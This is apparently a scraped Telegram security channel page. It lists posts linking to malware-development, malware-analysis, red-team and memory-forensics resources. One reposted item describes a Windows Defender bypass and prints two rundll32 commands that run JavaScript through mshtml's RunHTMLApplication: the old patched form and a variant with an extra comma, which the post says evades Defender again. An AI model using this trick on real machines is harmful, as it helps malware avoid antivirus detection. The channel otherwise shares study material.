Source Byte
Открыть в Telegram
هشیار کسی باید کز عشق بپرهیزد وین طبع که من دارم با عقل نیامیزد Saadi Shirazi 187
Больше8 321
Подписчики
Нет данных24 часа
-157 дней
-5630 дней
Архив постов
8 322
HOOKING 101
https://pdfs.semanticscholar.org/cb60/31f2d6eaa50d18a1ce5c648aa6c12e15fb23.pdf
#malware_dev
———
@islemolecule_source
8 322
Repost from Proxy Bar
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass.
*
то есть было и пофиксили:
C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
магия запятой:
C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass8 322
Reverse engineering of Android Phoenix RAT
Analysis: link
Phoenix overview: link
#malware_analysis
———
@islemolecule_source
8 322
Coyote: A multi-stage banking Trojan abusing the Squirrel installer
Link
#malware_analysis
———
@islemolecule_source
8 322
Red team road map
Intern / junior / medium / senior
Red team needed concepts
Credit : Sohiel Hashemi ( red teamer )
https://xmind.app/m/9Zcnkq
#red_team ,
———
@islemolecule_source
8 322
Windows Process Internals : A few Concepts to know before jumping on Memory Forensics
credit : Kirtar Oza
https://web.archive.org/web/20201117183039/https://eforensicsmag.com/windows-process-internals-a-few-concepts-to-know-before-jumping-on-memory-forensics-by-kirtar-oza/
#windows_internls . #memory_forensics
———
@islemolecule_source
